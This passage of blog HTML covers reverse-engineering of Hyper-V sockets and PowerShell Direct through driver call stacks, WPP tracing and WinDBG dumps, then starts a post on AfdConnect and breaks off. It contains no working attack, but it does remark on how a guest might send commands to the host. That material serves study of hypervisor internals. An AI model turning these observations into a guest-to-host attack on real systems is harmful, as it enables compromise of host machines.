<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMonitor</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="16" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateMonitors</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartChildConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChpChildConnectLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChpNegotiateVersionLocked</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMonitor</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="17" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvConnectPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentConnectDedicated</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentClaimInterruptRe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WS2_32!WSAConnect</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1000b</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="18" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentClaimInterruptR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WS2_32!WSAConnect</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1000c</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that in general the picture becomes more clear: when Enter-PSSession is executed in guest OS registration of the new interface for the vmbus driver is initiated. That operation leads to start of service vmicsession which starts powershell process with credentials transferred from root OS, this process opens Hyper-V sockets and starts to communicate with powershell.exe working in root OS using </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> calls.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Additional, I think, it should be noted that some logic of drivers execution (hvsocket.sys in our case) can be learned, using Windows software trace preprocessor (WPP).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In many drivers developed by Microsoft WPP is used, and traceview utility from WDK allows to see it. For this purpose it is necessary to know trace GUID. If to look in IDA, then the name of a variable which contains that GUID will be look as WPP_ThisDir_CTLGUID_HvSocketTraceGuid or WPP_ThisDir_CTLGUID_VMBusDriverTraceGuid (for vmbus driver). GUID will be in a binary look: 0B8A5B44354C0BBA849083340689010E5h. It needs to be transformed to a usual format (689010e5-3340-4908-a8bb-c05443b4a5b8), for instance, made </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dt _GUID team <the variable address></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> in WinDBG.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The received GUID can be entered into TraceView, when new session is started: File-> Create Ne Log Session-> Add Provider-></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="237" src="https://lh6.googleusercontent.com/EROwx2tWrgcM1jPsOHaxqCH0lGfTAUh4parwKVyL5T7CZkQ0wVv-6I12rAZIchedmZDMEaxKAy9mILGfJyv3WR8w-lasjE83pB0sEuppgrZg710GRTcs2Fpjs8sSDn9VwrPxPSc5eL7nHCKxkg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="210" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then to specify a path to the file in which data will be wrote. The picture will turn out not too informative (TMF file for decoding Microsoft does not offer):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="193" src="https://lh3.googleusercontent.com/nUhe0h4qQX-QgW8KjDDKcGJ0hH5wQrirDdVgs72qWT0jCRAyJ1uh_6T1b85G4hAewCyHXJQzzYJ_PBzWNe-7xxdM_y-J0NgeFwR6lMCdpqJB40Ft3Xv4lS3-CImKxX5VfUxbFl2JeiSOehbNKA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="490" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But if we load saved etl-file into Windows Message Analyzer, then we will be able to see PID and TID, and also the WPP message in a RAW look:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="163" src="https://lh4.googleusercontent.com/p5fS3MI8LKGZlEsDYPV1iuB99r9rBdKkxgEiCE5vbK_jUA9v4tezi5rZx8rW_f4c6VMRNFt2zVQ-AW7mkEIDew9lfRqa_XKPG7SVsfVwhHPCLLO_Bo8U0NLhwrXioTHv22LwhxXWkuK0AUn8rA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="552" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can see what contains in that addresses using WinDBG (Similar binary values met at a stage of initialization of a socket)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dc FFFF9D0C351266C0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`351266c0 00000001 00000000 00000004 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`351266d0 00000001 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`351266e0 00000000 00000000 00060001 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dc FFFF9D0C34A9C340</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`34a9c340 00000001 00000000 00000003 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`34a9c350 00000001 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`34a9c360 00000000 00000000 00060001 00000000 ................</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general, it is possible to draw a conclusion that PowerShell Direct was created for such cases when Hyper-V administrator and the administrator of the virtual server - the same person. Versatile dataflow goes from guest OS in a host OS, and is processed by powershell.exe started with Hyper-V Administrator privileges (the requirement for Powershell Direct work). Of course, having it is unlikely sent messages with the <cmd> tag to root OS, we can execute any commands, but the fact that vulnerabilities find in the dependent Windows components (.net, xml) more often than in the hypervisor module, is visually visible, for example, in the NVD database. However, specific conditions of use of vulnerabilities is necessary, in case of their existence, can make them unusable (the configuration - the terminal XenApp\RDS server on which user can get local administrator privileges and on which the Hyper-V administrator uses Powershell Direct). </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></div>
</li>
</ol>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In article, we considered some aspects of Hyper-V sockets work. By results it is possible to understand that from the architectural point of view their work a little differs from work of usual network sockets, however for their support certain changes were made to Windows network stack components. In my opinion, it is the first documented channel for data exchange between guest and host operating systems in Hyper-V virtualization environment. It can be used, for example, for data exchange between the USB device connected to root OS and guest OS that is quite useful for hardware locks of protection or two-factor authentication at an entrance to an operating system. Certainly, in the example given above it is used only for demonstration of their work. As, for example, how this mechanism of data transmission will be work for multithreaded applications with several channels or by transfer of large volume of data, it is difficult to tell now. Let's look whether developers will be use the opportunity of communications between guest and OS host given by the Microsoft.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">P.S. <a href="https://bit.ly/3DBeUa4">PDF version</a> </span></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-12065283183310290052017-06-23T04:51:00.000-07:002017-06-23T04:51:20.224-07:00Hyper-V sockets and AfdConnect<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> When we use sockets and call CONNECT method, it calls mswsock!WSPConnect. Then mswsock!WSPConnect calls NtDeviceIoControlFile. NtDeviceIoControlFile has following structure:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - point to \Device\Afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, - 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, - 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock,- 0036F4C0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode – 00012007 - IOCTL code</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer,- 0036F4E8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">InputBufferLength</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
